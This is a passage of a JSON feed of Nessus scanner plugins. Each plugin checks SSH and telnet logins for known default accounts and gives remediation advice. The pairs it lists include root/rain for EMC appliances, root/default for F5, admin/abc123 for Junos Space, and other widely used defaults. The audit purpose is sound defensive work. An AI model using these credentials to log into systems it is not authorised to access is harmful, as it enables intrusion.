pattern:\"Configuration\");\n close(soc);\n if( r && \"Configuration\" >< r )\n {\n security_hole(port);\n }\n }\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T14:56:32", "description": "The password for the account 'informix' on the remote host is 'informix'. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2007-02-06T00:00:00", "type": "nessus", "title": "Default Password (informix) for 'informix' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-07T00:00:00", "cpe": [], "id": "ACCOUNT_INFORMIX_INFORMIX.NASL", "href": "https://www.tenable.com/plugins/nessus/24275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"informix\";\npassword = \"informix\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24275);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (informix) for 'informix' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The password for the account 'informix' on the remote host is\n'informix'. An attacker may leverage this issue to gain access to the\naffected system and launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:51", "description": "The account 'OutOfBox' has no password set. An attacker may use the account to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'OutOfBox' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_OUTOFBOX.NASL", "href": "https://www.tenable.com/plugins/nessus/11244", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"OutOfBox\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11244);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'OutOfBox' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'OutOfBox' has no password set. An attacker may use the\naccount to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"os_fingerprint.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif ( ! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n{\n os = get_kb_item(\"Host/OS\");\n if ( os && \"IRIX\" >!< os )\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set, and the remote OS is not IRIX.\");\n}\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:31", "description": "The account 'admin' on the remote host has the default password '123456'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '123456' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_123456.NASL", "href": "https://www.tenable.com/plugins/nessus/94364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"123456\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94364);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '123456' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'123456'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:11:42", "description": "The account 'user' on the remote host has the password 'user'. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2012-09-19T00:00:00", "type": "nessus", "title": "Default Password (user) for 'user' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_USER_USER.NASL", "href": "https://www.tenable.com/plugins/nessus/62203", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"user\";\npassword = \"user\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62203);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (user) for 'user' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed using default credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'user' on the remote host has the password 'user'. An\nattacker may use it to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:23", "description": "The account 'root' on the remote host has the password 'rain'. An attacker may leverage this to gain access, likely as an administrator, to the affected system.\n\nNote that EMC Cloud Tiering Appliance is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-04-07T00:00:00", "type": "nessus", "title": "Default Password (rain) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/h:emc:cloud_tiering_appliance", "cpe:/a:emc:cloud_tiering_appliance_virtual_edition"], "id": "ACCOUNT_ROOT_RAIN.NASL", "href": "https://www.tenable.com/plugins/nessus/73371", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"rain\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73371);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (rain) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'rain'. An\nattacker may leverage this to gain access, likely as an administrator,\nto the affected system.\n\nNote that EMC Cloud Tiering Appliance is known to use these\ncredentials by default.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:emc:cloud_tiering_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:emc:cloud_tiering_appliance_virtual_edition\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:26", "description": "The account 'root' on the remote host has the default password '888888'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '888888' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_888888.NASL", "href": "https://www.tenable.com/plugins/nessus/94385", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"888888\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94385);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '888888' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'888888'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:07:38", "description": "The account 'root' on the remote host has the password 'default'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.\n\nNote that F5 Networks is known to use these credentials to provide complete administrative access to its appliances.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-07-31T00:00:00", "type": "nessus", "title": "Default Password (default) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/h:f5:big-ip"], "id": "ACCOUNT_ROOT_DEFAULT.NASL", "href": "https://www.tenable.com/plugins/nessus/76941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"default\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76941);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (default) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'default'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\n\nNote that F5 Networks is known to use these credentials to provide\ncomplete administrative access to its appliances.\");\n # http://support.f5.com/kb/en-us/solutions/public/13000/100/sol13148.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ec6a297f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:12:42", "description": "The account 'admin' on the remote host has the default password 'abc123'. An attacker can leverage this issue to gain full access to the affected system.\n\nNote that Junos Space is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-12-22T00:00:00", "type": "nessus", "title": "Default Password (abc123) for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "ACCOUNT_ADMIN_ABC123.NASL", "href": "https://www.tenable.com/plugins/nessus/80190", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"abc123\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80190);\n script_version(\"1.8\");\n 